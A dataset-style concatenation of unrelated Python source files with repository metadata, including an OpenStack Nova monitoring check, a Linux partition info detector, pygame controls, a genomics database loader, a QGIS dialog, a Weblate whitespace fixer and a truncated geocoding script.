        nova = Client(novaVersion,cred.getCinder()['username'],cred.getCinder()['password'],cred.getCinder()['tenant_name'],cred.getCinder()['auth_url'])
    except:
        print "Unable to connect to OpenStack API endpoint."
        sys.exit(STATUS_CRITICAL)
    # Time how long the instance-name lookup takes end to end.
    find = findServer(nova.servers.list(),args.instance)
    endTime = time.time()
    timeElapse = endTime - startTime
    if find:
        # Compare elapsed time against the -w/-c thresholds (seconds).
        if timeElapse < float(args.warning):
            print "OpenStack Nova OK! Nova Instance name %s retrieval successfull. Time taken for retrieval %s | Instance Name Retrieval Time=%s" % (args.instance,round(timeElapse,3),round(timeElapse,3))
            sys.exit(STATUS_OK)
        elif (timeElapse >= float(args.warning)) and (timeElapse < float(args.critical)):
            print "OpenStack Nova Warning! Nova Instance name %s retrieval successfull but time taken was longer. Time taken for retrieval %s | Nova Instance Name Retrieval Time=%s" % (args.instance,round(timeElapse,3),round(timeElapse,3))
            sys.exit(STATUS_WARNING)
        elif timeElapse >= float(args.critical):
            print "OpenStack Nova Critical! Nova Instance name %s retrieval successfull but time taken was longer than critical time. Time taken for retrieval %s | Nova Instance Retrieval Time=%s" % (args.instance,round(timeElapse,3),round(timeElapse,3))
            sys.exit(STATUS_CRITICAL)
    else:
        # The API answered but the named instance was not found.
        print "OpenStack Might be OK! But the Nova Instance name you have specified could not be found."
        sys.exit(STATUS_WARNING)
# Script entry point.
if __name__ == '__main__':
    main()
|
UTF-8
|
Python
| false | false | 2,014 |
3,848,290,728,478 |
88165f0da0f5572fe034459be15ae8ce808f4fca
|
10a190efddadfaad31372d8a5acf9d76e081f5a7
|
/src/Python/modules/device_info/detect_device_info_linux.py
|
486493a2d3c434db6359200cf7c316d9c40e6c12
|
[] |
no_license
|
Auzzy/personal
|
https://github.com/Auzzy/personal
|
1b410d84f3135ee9b5d271e3a9b71d110273c198
|
e8135c5023ae55b947863d0ab1be94c40591ac58
|
refs/heads/master
| 2016-09-11T04:18:58.934896 | 2014-06-14T05:58:40 | 2014-06-14T05:58:40 | 1,724,124 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from parse_parts import parse_parts
from parse_devs import parse_devs
# Each key must exist as info about the device. If any of these keys doesn't exist, it is not a valid and useful device. The value is the required value. If this value does not match the value given by the device, then it is not a valid device. If the required value is None, then do not check the value given by the device. See the _filter_non_fs() to see its use.
_fs_attribs = {"ID_FS_TYPE":None, "DEVTYPE":"partition"}
# Device info attributes that must be decoded.
_decode_attribs = ["ID_VENDOR_ENC", "ID_MODEL_ENC", "ID_FS_LABEL_ENC"]
# Device info keys and their associated human readable name. These keys will exist in the output dictionary.
_attribs_dict = {"DEVNAME":"device", "ID_VENDOR_DEC":"vendor", "ID_MODEL_DEC":"product", "ID_FS_LABEL_DEC":"label"}
# dict{str:dict{str:str}} -> dict{str:dict{str:str}}
def _filter_attribs(all_dev_info):
    """Reduce each device's raw attribute dict to only the keys listed in
    _attribs_dict, renamed to their human readable names."""
    filtered = {}
    for dev_name, dev_info in all_dev_info.items():
        filtered[dev_name] = dict(
            (human_name, dev_info[raw_key])
            for raw_key, human_name in _attribs_dict.items())
    return filtered
# str -> str
def _decode(string):
    """Decode ``\\xNN`` hex escape sequences in *string* into characters.

    Returns None unchanged.  NOTE: uses ``unichr``, so this is
    Python-2-only code.
    """
    if string is None:
        return None
    new_str = ""
    hex_marker = r"\x"
    while hex_marker in string:
        char_start = string.index(hex_marker)
        # Exactly two hex digits follow the marker; turn them into one char.
        decoded_char = str(unichr(int(string[char_start+2:char_start+4],16)))
        # Copy everything before the escape, then the decoded character,
        # then continue scanning the remainder.
        new_str += string[:char_start]
        new_str += decoded_char
        string = string[char_start+4:]
    new_str += string
    return new_str
# dict{str:dict{str:str}} -> None
def _decode_values(all_dev_info):
    """For every device, decode each *_ENC attribute in place into a new
    *_DEC key (absent/None attributes are skipped)."""
    for dev_name in all_dev_info:
        for encode_key in _decode_attribs:
            encoded_val = all_dev_info[dev_name][encode_key]
            if encoded_val is not None:
                # e.g. ID_VENDOR_ENC -> ID_VENDOR_DEC
                decode_key = encode_key.replace("_ENC","_DEC")
                all_dev_info[dev_name][decode_key] = _decode(encoded_val).strip()
# dict{str:dict{str:str}} -> None
def _insert_placeholders(all_dev_info):
    """Ensure every expected attribute key exists on each device,
    defaulting missing ones to None."""
    expected_attribs = _decode_attribs + _attribs_dict.keys()
    for dev_info in all_dev_info.values():
        for attrib in expected_attribs:
            dev_info.setdefault(attrib, None)
# dict{str:dict{str:str}} -> bool
def _valid_fs_val(dev_info, fs_attrib):
    """True when *dev_info* has *fs_attrib* and its value satisfies the
    requirement in _fs_attribs (None means any value is acceptable)."""
    if fs_attrib not in dev_info.keys():
        return False
    required_val = _fs_attribs[fs_attrib]
    return required_val is None or dev_info[fs_attrib] == required_val
# dict{str:dict{str:str}} -> bool
def _valid_device(dev_info):
    """True when every filesystem attribute in _fs_attribs checks out."""
    return all(_valid_fs_val(dev_info, fs_attrib) for fs_attrib in _fs_attribs)
# dict{str:dict{str:str}} -> None
def _filter_non_fs(all_dev_info):
    """Drop devices that do not look like valid filesystem partitions
    (per _fs_attribs), mutating *all_dev_info* in place.

    NOTE: ``.keys()[:]`` copies the key list before deleting entries --
    Python 2 only (dict views are not sliceable in Python 3).
    """
    for dev in all_dev_info.keys()[:]:
        if not _valid_device(all_dev_info[dev]):
            del all_dev_info[dev]
# list[str] -> dict{str:dict{str:str}}
def _get_device_info(all_part_names):
    """Fetch device info for the named partitions (via parse_devs) and
    reduce it to human readable attribute dicts for real filesystems."""
    all_dev_info = parse_devs(all_part_names)
    # Order matters: filter first, then fill gaps, decode, and rename.
    _filter_non_fs(all_dev_info)
    _insert_placeholders(all_dev_info)
    _decode_values(all_dev_info)
    return _filter_attribs(all_dev_info)
# None -> list[str]
def _get_partition_names():
    """Return the "name" field of every partition reported by parse_parts().

    Raises OSError when no partitions are found or the expected "name"
    property is missing (both suggest /proc/partitions changed format).
    """
    parts = parse_parts()
    if not parts:
        raise OSError("As no partitions were detected, it is likely there was an error with reading /proc/partitions. Please check to see that the file format has not changed.")
    if "name" not in parts[0].keys():
        raise OSError("The \"name\" property could not be found. Check to see if the format of /proc/partitions has changed.")
    return [part_info["name"] for part_info in parts]
# None -> dict{str:dict{str:str}}
def detect_device_info():
    """Map each detected filesystem device name to a dict of its human
    readable attributes (device, vendor, product, label)."""
    return _get_device_info(_get_partition_names())
if __name__=="__main__":
all_dev_info = detect_device_info()
for dev_name in all_dev_info:
print dev_name
for attrib in all_dev_info[dev_name]:
print "{0}: {1}".format(attrib,all_dev_info[dev_name][attrib])
print
|
UTF-8
|
Python
| false | false | 2,014 |
17,403,207,514,741 |
3faf0c348b23a123328641c02ac160d8460fb430
|
f3c58a46be70583a6d2b9692122df2010af22734
|
/controls.py
|
cc3e34d6da913a3c9626c27ac031d6fdc61e4b63
|
[
"GPL-3.0-only"
] |
non_permissive
|
DanailKoychev/Cronch-game
|
https://github.com/DanailKoychev/Cronch-game
|
0fc88be8ec7a37e8b88da7351f2c8731973e80de
|
2e797aacb704883afee8d00fd028af1b33979f8b
|
refs/heads/master
| 2021-01-22T07:13:48.553603 | 2014-06-28T11:19:52 | 2014-06-28T11:19:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from pygame.locals import *
import pygame
class Controls:
    """Keyboard polling for a local two-player game.

    The constants below are the instruction codes returned by the two
    polling helpers.
    """

    MOVE_LEFT = 1
    MOVE_RIGHT = 2
    USE_SKILL = 3
    AIM_LEFT = 4
    AIM_RIGHT = 5
    SHOOT = 6

    # BUG FIX: these helpers take no self/cls argument, so on Python 2
    # calling them through the class raised TypeError (unbound method).
    # Mark them as static methods; call sites are unchanged.
    @staticmethod
    def get_keyboard_input_player_2():
        """Return the instructions player 2 is currently pressing.

        Player 2 moves/uses skill with the numpad (1/3/5) and aims/shoots
        with the arrow keys.
        """
        instructions = []
        keys = pygame.key.get_pressed()
        if keys[K_KP1]:
            instructions.append(Controls.MOVE_LEFT)
        if keys[K_KP3]:
            instructions.append(Controls.MOVE_RIGHT)
        if keys[K_KP5]:
            instructions.append(Controls.USE_SKILL)
        if keys[K_LEFT]:
            instructions.append(Controls.AIM_LEFT)
        if keys[K_RIGHT]:
            instructions.append(Controls.AIM_RIGHT)
        if keys[K_UP]:
            instructions.append(Controls.SHOOT)
        return instructions

    @staticmethod
    def get_keyboard_input_player_1():
        """Return the instructions player 1 is currently pressing.

        Player 1 moves/uses skill with G/J/Y and aims/shoots with A/D/W.
        """
        instructions = []
        keys = pygame.key.get_pressed()
        if keys[K_g]:
            instructions.append(Controls.MOVE_LEFT)
        if keys[K_j]:
            instructions.append(Controls.MOVE_RIGHT)
        if keys[K_y]:
            instructions.append(Controls.USE_SKILL)
        if keys[K_a]:
            instructions.append(Controls.AIM_LEFT)
        if keys[K_d]:
            instructions.append(Controls.AIM_RIGHT)
        if keys[K_w]:
            instructions.append(Controls.SHOOT)
        return instructions
|
UTF-8
|
Python
| false | false | 2,014 |
8,040,178,797,697 |
57413e56698b360c33754b90fab78a783d78a7a8
|
1a897f626be0348ab84aee55bb3f3adc5167ac82
|
/src/db/input/AddIndividualAlignmentConsensusSequence2DB.py
|
0aac86e5bb8b654368bee660a56c5a141dd14933
|
[] |
no_license
|
polyactis/vervet-web
|
https://github.com/polyactis/vervet-web
|
13f2fc1f0e8711045e7e592ef6c5e61065d8b269
|
a550680f83d4c0c524734ee94bdd540c40f3a537
|
refs/heads/master
| 2021-01-01T18:18:09.094561 | 2014-05-15T23:37:54 | 2014-05-15T23:37:54 | 32,554,427 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
"""
Examples:
%s
%s -i folderMap/926_635_tantalus_GA_vs_524.fq.gz --individual_alignment_id 926
--format fastq --minDP 4 --maxDP=16 --minBaseQ=20 --minMapQ 30 --minRMSMapQ 10
--minDistanceToIndel 5 --data_dir /u/home/eeskin/polyacti/NetworkData/vervet/db/
--logFilename folderMap/926_635_tantalus_GA_vs_524_alignment926_2DB.log
--drivername postgresql --hostname localhost --dbname vervetdb
--db_user yh --db_passwd secret --schema public --commit
Description:
2013.2.8 add alignment consensus sequence file (fastq format, input of the fq2psmcfa program from PSMC) to db
"""
import sys, os, math
__doc__ = __doc__%(sys.argv[0], sys.argv[0])
sys.path.insert(0, os.path.expanduser('~/lib/python'))
sys.path.insert(0, os.path.join(os.path.expanduser('~/script')))
import copy
from pymodule import ProcessOptions, PassingData, utils, NextGenSeq
from vervet.src.mapper.AbstractVervetMapper import AbstractVervetMapper
from vervet.src import VervetDB
class AddIndividualAlignmentConsensusSequence2DB(AbstractVervetMapper):
    # Reuse the module docstring (usage examples) as the class docstring,
    # so ProcessOptions prints it as help text.
    __doc__ = __doc__

    # Start from the parent's option table, drop the output options this
    # tool does not take, and add its own filter/threshold parameters.
    option_default_dict = copy.deepcopy(AbstractVervetMapper.option_default_dict)
    #option_default_dict.pop(('inputFname', 0, ))
    option_default_dict.pop(('outputFname', 0, ))
    option_default_dict.pop(('outputFnamePrefix', 0, ))
    option_default_dict.update({
        ('individual_alignment_id', 1, int):[None, '', 1, 'alignment id'],\
        ('minDP', 1, int):[None, '', 1, 'minimum read depth at that locus'],\
        ('maxDP', 1, int):[None, '', 1, 'maximum read depth at that locus'],\
        ('minBaseQ', 1, int):[20, '', 1, 'inferred consensus base quality '],\
        ('minMapQ', 1, int):[30, '', 1, 'read alignment mapping quality'],\
        ('minRMSMapQ', 1, int):[10, '', 1, 'root mean squared mapping quality of reads covering the locus'],\
        ('minDistanceToIndel', 1, int):[5, '', 1, 'min distance to predicted short insertions or deletions'],\
        ('format', 1, ):['fastq', '', 1, 'format of the input file'],\
        })

    def __init__(self, inputFnameLs=None, **keywords):
        """Initialize via the parent mapper and canonicalize the input path."""
        AbstractVervetMapper.__init__(self, inputFnameLs=inputFnameLs, **keywords)
        self.inputFname= os.path.realpath(self.inputFname)

    def add2DB(self, db=None, individual_alignment_id=None, inputFname=None, format=None, minDP=None, maxDP=None, minBaseQ=None, minMapQ=None,\
            minRMSMapQ=None, minDistanceToIndel=None, comment=None, data_dir=None, commit=0):
        """Register *inputFname* as an alignment-consensus-sequence record in db.

        Exits with code 3 if an identical record (same alignment id and
        filter parameters) already exists.  When *commit* is true the file
        is also copied into the db-affiliated storage; otherwise the
        transaction is rolled back.
        """
        session = db.session
        session.begin()
        # 2012.11.13 check if it's in db already
        db_entry = db.checkIndividualAlignmentConsensusSequence(individual_alignment_id=individual_alignment_id, minDP=minDP, \
                maxDP=maxDP, minBaseQ=minBaseQ, minMapQ=minMapQ,\
                minRMSMapQ=minRMSMapQ, minDistanceToIndel=minDistanceToIndel)
        if db_entry:
            sys.stderr.write("Warning: IndividualAlignmentConsensusSequence of (individual_alignment_id=%s, minDP %s, maxDP %s, etc.) already in db with id=%s.\n"%\
                    (individual_alignment_id, minDP, maxDP, db_entry.id))
            sys.exit(3)
        else:
            # Record sequence counts so the db row describes the file content.
            countData = NextGenSeq.countNoOfChromosomesBasesInFastQFile(inputFname)
            no_of_chromosomes = countData.no_of_chromosomes
            no_of_bases = countData.no_of_bases
            db_entry = db.getIndividualAlignmentConsensusSequence(individual_alignment_id=individual_alignment_id, format=format, \
                    minDP=minDP, maxDP=maxDP, minBaseQ=minBaseQ, \
                    minMapQ=minMapQ, minRMSMapQ=minRMSMapQ, minDistanceToIndel=minDistanceToIndel, \
                    no_of_chromosomes=no_of_chromosomes,no_of_bases=no_of_bases, \
                    original_path=os.path.abspath(inputFname), data_dir=data_dir)
        if commit:
            inputFileBasename = os.path.basename(inputFname)
            #moveFileIntoDBAffiliatedStorage() will also set db_entry.path
            exitCode = db.moveFileIntoDBAffiliatedStorage(db_entry=db_entry, filename=inputFileBasename, \
                    inputDir=os.path.split(inputFname)[0], \
                    outputDir=data_dir,\
                    relativeOutputDir=None, shellCommand='cp -rL', \
                    srcFilenameLs=self.srcFilenameLs, dstFilenameLs=self.dstFilenameLs,\
                    constructRelativePathFunction=db_entry.constructRelativePath, data_dir=data_dir)
            if exitCode!=0:
                sys.stderr.write("Error: moveFileIntoDBAffiliatedStorage() exits with %s code.\n"%(exitCode))
                session.rollback()
                self.cleanUpAndExitOnFailure(exitCode=exitCode)
            session.flush()
            session.commit()
        else:	#default is also rollback(). to demonstrate good programming
            session.rollback()

    def run(self):
        """Entry point: add the input file to the db and log completion."""
        if self.debug:
            import pdb
            pdb.set_trace()
        #add the extracted association result into db
        self.add2DB(db=self.db_vervet, individual_alignment_id=self.individual_alignment_id, inputFname=self.inputFname, \
                format=self.format, minDP=self.minDP, maxDP=self.maxDP, minBaseQ=self.minBaseQ, minMapQ=self.minMapQ, \
                minRMSMapQ=self.minRMSMapQ, minDistanceToIndel=self.minDistanceToIndel, comment=None, \
                data_dir=self.data_dir, commit=self.commit)
        self.outputLogMessage("submission done.\n")
# Script entry point: parse command-line options and run the mapper.
if __name__ == '__main__':
    main_class = AddIndividualAlignmentConsensusSequence2DB
    po = ProcessOptions(sys.argv, main_class.option_default_dict, error_doc=main_class.__doc__)
    instance = main_class(po.arguments, **po.long_option2value)
    instance.run()
|
UTF-8
|
Python
| false | false | 2,014 |
16,286,516,009,867 |
5cc8ebec47276d7154435ffec8c44479b92f9f43
|
d84922ed03e9d01c84e92b384f20b87edb3ece6d
|
/src/cog_abm/extras/color.py
|
32b4a0b6df7e2f64a6732fc1de8ea1f59ae4b31e
|
[
"BSD-3-Clause"
] |
permissive
|
plewczynski/cog-abm
|
https://github.com/plewczynski/cog-abm
|
b1d37cf70f4a1d005e424a085159818dd776bd5e
|
6f6450141a996b067d3a396d47f4386215a4042c
|
refs/heads/master
| 2021-05-27T11:33:24.433639 | 2012-08-25T21:01:37 | 2012-08-25T21:01:37 | 765,520 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
Module providing definition of the Color class, implementing Perception's and
the Stimulus' interfaces.
"""
from cog_abm.ML.core import Sample, euclidean_distance
class Color(Sample):
    """A color expressed in the CIE L*a*b* color space.

    Behaves as a Sample whose feature vector is [L, a, b] compared with
    Euclidean distance.
    """

    def __init__(self, L, a, b):
        """Create a color from its L*a*b* coordinates.

        See http://en.wikipedia.org/wiki/Lab_color_space
        (section: Range_of_L.2Aa.2Ab.2A_coordinates).

        @param L: lightness - should be in [0,100]
        @param a: can be negative
        @param b: can be negative
        """
        coordinates = [L, a, b]
        super(Color, self).__init__(coordinates, dist_fun=euclidean_distance)
        self.L = L
        self.a = a
        self.b = b
def get_WCS_colors():
    """Load the 330 WCS color stimuli from the bundled 330WCS.xml file."""
    from cog_abm.extras.parser import Parser
    import os
    return Parser().parse_environment(
        os.path.join(os.path.dirname(__file__), "330WCS.xml")).stimuli
def get_1269Munsell_chips():
    """Load the 1269 Munsell chip stimuli from the bundled XML file."""
    from cog_abm.extras.parser import Parser
    import os
    return Parser().parse_environment(os.path.join(os.path.dirname(__file__),
        "1269_munsell_chips.xml")).stimuli
|
UTF-8
|
Python
| false | false | 2,012 |
16,904,991,298,362 |
304a340d51b3169e268d83e856f09f3e3f69d38c
|
c6a291151e89bdc5fb10306dd66407fa21bad3a8
|
/Text/CountVowels.py
|
1816d96ae992495f7a4bc38458ef1d1a4f199a90
|
[
"LicenseRef-scancode-proprietary-license"
] |
non_permissive
|
gcousins/PythonChallenge
|
https://github.com/gcousins/PythonChallenge
|
6f61579ea84583d5a492046b1c15ef692cc487fd
|
ec41ad6e4573eebc4becc652255de39cd030eaa0
|
refs/heads/master
| 2016-09-05T16:49:45.861387 | 2013-07-11T03:29:26 | 2013-07-11T03:29:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# The lowercase vowels we count.
vowels = 'aeiou'


def CountVowels(text):
    """Print the total number of lowercase vowels in *text*, then a
    per-vowel breakdown (one "v: count" line per vowel)."""
    total = sum(1 for ch in text if ch in vowels)
    print(str(total))
    for v in vowels:
        print(v + ': ' + str(text.count(v)))
#set loop to continuously run
while True:
#intialize user input requst
text = str(raw_input("Please enter a word to count the vowels: "))
#terminate the loop if nothing is entered
if text == "":
print('Goodbye')
break
else:
#run the reverse function on the input
CountVowels(text)
|
UTF-8
|
Python
| false | false | 2,013 |
1,700,807,076,898 |
64a1a17d14d2c374ac49cbaca5c0ca3767838a74
|
76d36b932c50a8755968addff84443c3dc4f8485
|
/tools/geodesicbase.py
|
9261a53b5d016d18e69ace6c1c1ddef1f0b83e10
|
[] |
no_license
|
tuapsekad/openLand
|
https://github.com/tuapsekad/openLand
|
35e27dfe2428aa30a5e1d673545420fab04f6aa2
|
7c418cfb84a228c06ce6838397d38723fb32bec7
|
refs/heads/master
| 2021-01-23T21:33:05.799625 | 2014-07-04T03:57:14 | 2014-07-04T03:57:14 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
'''
/***************************************************************************
geodesicbase for openland (cadastral engineer tools)
copyright : (C) 2013 by Dmitriy Biryuchkov
email : [email protected]
***************************************************************************/
'''
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from datetime import *
import uuid
from geodesicbase_ui import Ui_DialogGeodesicBase
from common import *
class GeodesicBase(QDialog, Ui_DialogGeodesicBase):
    """Dialog for managing geodesic control points (table pb_geo_osnova):
    listing, selecting, adding, editing and deleting them.

    NOTE(review): helper names such as attributesBySearchCondition,
    attributesNamesGeodesicBase, reNull, idCurrentMSK, insertFeatures,
    updateFeature, deleteById, okay and cancel come from
    ``from common import *`` -- confirm there.
    """

    def __init__(self, iface):
        """Build the dialog and wire up the button/tree signals."""
        QDialog.__init__(self, iface.mainWindow())
        self.iface = iface
        self.canvas = self.iface.mapCanvas()
        self.setupUi(self)
        self.connect(self.pushButtonSelect, SIGNAL("clicked()"), self.selectData)
        self.connect(self.pushButtonAdd, SIGNAL("clicked()"), self.addData)
        self.connect(self.pushButtonEdit, SIGNAL("clicked()"), self.editData)
        self.connect(self.pushButtonDel, SIGNAL("clicked()"), self.delData)
        self.connect(self.pushButtonSave, SIGNAL("clicked()"), self.saveData)
        self.connect(self.pushButtonRefresh, SIGNAL("clicked()"), self.refreshData)
        self.connect(self.pushButtonClose, SIGNAL("clicked()"), self.closeDialog)
        self.connect(self.treeWidget, SIGNAL("itemSelectionChanged()"), self.fillLinesEdit)
        # guid of the currently highlighted point, guid chosen via Select,
        # and the id of the current coordinate system.
        self.guidGeodesicBase = None
        self.selectedGuid = None
        self.idCurrentMsk = None

    def fillTree(self):
        """Reload the tree with all points, re-selecting the previous one."""
        guidGeodesicBase = ''
        self.treeWidget.clear()
        lastSelectedGeodesicBaseItem = None
        listGeodesicBase = attributesBySearchCondition('pb_geo_osnova', 'true',
                                                       attributesNamesGeodesicBase)
        for everyGeodesicBase in listGeodesicBase:
            guidGeodesicBase = str(everyGeodesicBase['guid'])
            name = everyGeodesicBase['nazvanie_punkta']
            x = str(everyGeodesicBase['x'])
            y = str(everyGeodesicBase['y'])
            itemForInsert = QTreeWidgetItem([name, x, y])
            # Column 3 (hidden from the visible name/x/y columns) stores the guid.
            itemForInsert.setData(3, 0, guidGeodesicBase)
            self.treeWidget.addTopLevelItem(itemForInsert)
            if self.guidGeodesicBase == guidGeodesicBase:
                lastSelectedGeodesicBaseItem = itemForInsert
        if lastSelectedGeodesicBaseItem != None:
            self.treeWidget.setCurrentItem(lastSelectedGeodesicBaseItem)
            self.pushButtonSelect.setEnabled(True)

    def fillLinesEdit(self):
        """Populate the edit fields from the point selected in the tree."""
        if len(self.treeWidget.selectedItems()) == 1:
            self.guidGeodesicBase = self.treeWidget.selectedItems()[0].data(3, 0)
        if self.guidGeodesicBase != None:
            attributesGeodesicBase = attributesByKeys('pb_geo_osnova', 'guid',
                                                      [self.guidGeodesicBase],
                                                      attributesNamesGeodesicBase)
            # skip guid
            self.lineEditPName.setText(attributesGeodesicBase[0]['nazvanie_punkta'])
            self.lineEditPKind.setText(reNull(attributesGeodesicBase[0]['tip_znaka'], ''))
            self.lineEditPKlass.setText(reNull(attributesGeodesicBase[0]['klass_geo_seti'], ''))
            self.lineEditOrdX.setText(str(attributesGeodesicBase[0]['x']))
            self.lineEditOrdY.setText(str(attributesGeodesicBase[0]['y']))
            self.pushButtonSelect.setEnabled(True)
        else:
            self.pushButtonSelect.setEnabled(False)

    def selectData(self):
        """Remember the chosen point's guid and close the dialog."""
        if len(self.treeWidget.selectedItems()) == 1:
            self.selectedGuid = self.guidGeodesicBase = self.treeWidget.selectedItems()[0].data(3, 0)
            self.close()

    def addData(self):
        """Insert a new point built from the edit fields (fresh guid)."""
        guidGeodesicBase = str(uuid.uuid4())
        self.idCurrentMsk = str(idCurrentMSK())
        # 'guid', 'id_sistema_koordinat', 'nazvanie_punkta', 'tip_znaka', 'klass_geo_seti', 'x', 'y'
        #  0       1                      2                  3            4                 5    6
        # Fall back to 0.0 (with a status message) when a coordinate
        # cannot be parsed as a float.
        try:
            x = float(self.lineEditOrdX.text())
        except:
            x = 0.0
            self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка преобразования X')
        try:
            y = float(self.lineEditOrdY.text())
        except:
            y = 0.0
            self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка преобразования Y')
        listValues = []
        listValues.append(guidGeodesicBase)
        listValues.append(self.idCurrentMsk)
        listValues.append(self.lineEditPName.text())
        listValues.append(self.lineEditPKind.text())
        listValues.append(self.lineEditPKlass.text())
        listValues.append(x)
        listValues.append(y)
        if insertFeatures('pb_geo_osnova', attributesNamesGeodesicBase, [listValues]):
            self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Выполнено добавление атрибутов пункта геодезической сети')
            self.guidGeodesicBase = guidGeodesicBase
        else:
            self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка добавления атрибутов пункта геодезической сети')
        self.fillTree()

    def editData(self):
        """Switch the buttons into edit mode (only Save enabled)."""
        if len(self.treeWidget.selectedItems()) == 1:
            self.pushButtonAdd.setEnabled(False)
            self.pushButtonEdit.setEnabled(False)
            self.pushButtonSave.setEnabled(True)
            self.pushButtonDel.setEnabled(False)

    def delData(self):
        """Delete the selected point after user confirmation."""
        if len(self.treeWidget.selectedItems()) == 1:
            self.guidGeodesicBase = self.treeWidget.selectedItems()[0].data(3, 0)
            nameForDelete = self.treeWidget.currentItem().text(0)
            reply = QMessageBox.question(self, u'Потверждение',
                                         u'Удалить информацию о пункте геодезической сети ' + nameForDelete + '?',
                                         okay|cancel, defaultButton=cancel)
            if reply == okay:
                if deleteById('pb_geo_osnova', self.guidGeodesicBase):
                    self.guidGeodesicBase = None
                    self.refreshData()
                    self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Выполнено удаление атрибутов пункта геодезической сети')
                else:
                    self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка удаления атрибутов пункта геодезической сети')

    def saveData(self):
        """Write the edit-field values back to the selected point."""
        if len(self.treeWidget.selectedItems()) == 1:
            self.guidGeodesicBase = self.treeWidget.selectedItems()[0].data(3, 0)
            self.idCurrentMsk = str(idCurrentMSK())
            # Same float-parsing fallbacks as in addData().
            try:
                x = float(self.lineEditOrdX.text())
            except:
                x = 0.0
                self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка преобразования X')
            try:
                y = float(self.lineEditOrdY.text())
            except:
                y = 0.0
                self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка преобразования Y')
            listValues = []
            listValues.append(self.guidGeodesicBase)
            listValues.append(self.idCurrentMsk)
            listValues.append(self.lineEditPName.text())
            listValues.append(self.lineEditPKind.text())
            listValues.append(self.lineEditPKlass.text())
            listValues.append(x)
            listValues.append(y)
            if updateFeature('pb_geo_osnova', self.guidGeodesicBase,
                             attributesNamesGeodesicBase, listValues):
                self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Выполнено обновление атрибутов пункта геодезической сети')
            else:
                self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка обновления атрибутов пункта геодезической сети')
            self.fillTree()
            # Leave edit mode.
            self.pushButtonAdd.setEnabled(True)
            self.pushButtonEdit.setEnabled(True)
            self.pushButtonSave.setEnabled(False)
            self.pushButtonDel.setEnabled(True)

    def refreshData(self):
        """Reset the buttons to browse mode and reload tree and fields."""
        self.pushButtonAdd.setEnabled(True)
        self.pushButtonEdit.setEnabled(True)
        self.pushButtonSave.setEnabled(False)
        self.pushButtonDel.setEnabled(True)
        self.fillTree()
        self.fillLinesEdit()

    def closeDialog(self):
        """Close without selecting anything."""
        self.guidGeodesicBase = None
        self.close()
# QMessageBox.information(self.iface.mainWindow(), 'test', str())
|
UTF-8
|
Python
| false | false | 2,014 |
10,849,087,403,073 |
139e902cd66dc08845b2f858fb62aa5bb2690fcd
|
216436ec15b0c861d0a077e7e1b04b95eacfe3e5
|
/weblate/trans/autofixes/whitespace.py
|
f5c07bbd2121de3856b56b340f9a3858cb3446c1
|
[
"GPL-3.0-only",
"GPL-3.0-or-later"
] |
non_permissive
|
ruleant/weblate
|
https://github.com/ruleant/weblate
|
f862b73d3a252b64861d941def781c06264cd06b
|
621bcaa6ee4715c6980466d85378974993ac9d1c
|
refs/heads/master
| 2020-04-05T01:41:55.950291 | 2014-07-02T10:59:10 | 2014-07-02T10:59:10 | 4,017,606 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2014 Michal Čihař <[email protected]>
#
# This file is part of Weblate <http://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import re
from django.utils.translation import ugettext_lazy as _
from weblate.trans.autofixes.base import AutoFix
class SameBookendingWhitespace(AutoFix):
'''
Help non-techy translators with their whitespace
'''
name = _('Trailing and leading whitespace')
def fix_single_target(self, target, source, unit):
# normalize newlines of source
source = re.compile(r'\r\n|\r|\n').sub('\n', source)
# capture preceding and tailing whitespace
start = re.compile(r'^(\s+)').search(source)
end = re.compile(r'(\s+)$').search(source)
head = start.group() if start else ''
tail = end.group() if end else ''
# add the whitespace around the target translation (ignore blanks)
stripped = target.strip()
if stripped:
newtarget = '%s%s%s' % (head, stripped, tail)
return newtarget, newtarget != target
return target, False
|
UTF-8
|
Python
| false | false | 2,014 |
19,121,194,425,950 |
e3fd8c9532086117149ae94d088ee830d012c50d
|
3192c7a6902dd45759a3cf440d8c986404935a9a
|
/polling_locations.py
|
8c44e555b65e3a8a27e9e556b7433016c5b13c79
|
[] |
no_license
|
seshness/tweets-of-voter-shame
|
https://github.com/seshness/tweets-of-voter-shame
|
a03133cbb1c82f0ecc1e76cba3892571a1287331
|
0475eccca8b6d44797a5a64393f26de07458b870
|
refs/heads/master
| 2021-01-22T22:49:50.281235 | 2012-11-07T16:18:27 | 2012-11-07T16:18:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import requests
import fileinput
import json
from secrets import YAHOO_APP_ID
def make_url(location):
    """Build the Yahoo PlaceFinder geocode URL for *location*, requesting JSON.

    Bug fix: ``.format()`` previously applied only to the trailing
    ``'&flags=J'`` literal (method call binds tighter than ``+``), so the
    ``{0}`` placeholder was never substituted and the query was always
